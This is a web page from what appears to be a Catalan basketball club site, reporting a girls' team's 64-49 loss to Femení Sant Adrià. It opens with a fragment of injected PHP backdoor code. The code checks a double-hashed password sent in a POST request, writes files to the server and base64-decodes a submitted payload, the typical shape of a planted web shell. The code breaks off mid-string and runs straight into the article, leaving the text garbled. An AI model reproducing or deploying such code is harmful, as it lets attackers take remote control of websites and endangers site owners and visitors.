function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení A fa una bona primera meitat però sucumbeix al potencial del Femení Sant Adrià (64-49) - Tgn Bàsquet Club -

L’infantil femení A fa una bona primera meitat però sucumbeix al potencial del Femení Sant Adrià (64-49)

Updated: maig 7, 2019

L’infantil femení A va caure contra un dels grans equips de la lliga després de fer un partit, tot s’ha de dir, molt meritori. El conjunt que entrena David Artero va fer una demostració de d’orgull i bon joc durant els primers vint minuts gràcies a una gran defensa, i això li va permetre arribar al descans per davant (29-30). Però el Femení Sant Adrià, que és un gran equip, va reaccionar en el tercer quart. Les locals van moure molt bé la pilota en atac i les tarragonines arribaven tard. La defensa no va poder aturar el ritme de joc de les locals que van marcar un parcial de 20-5 en aquests deu minuts que seria decisiu per entendre la derrota.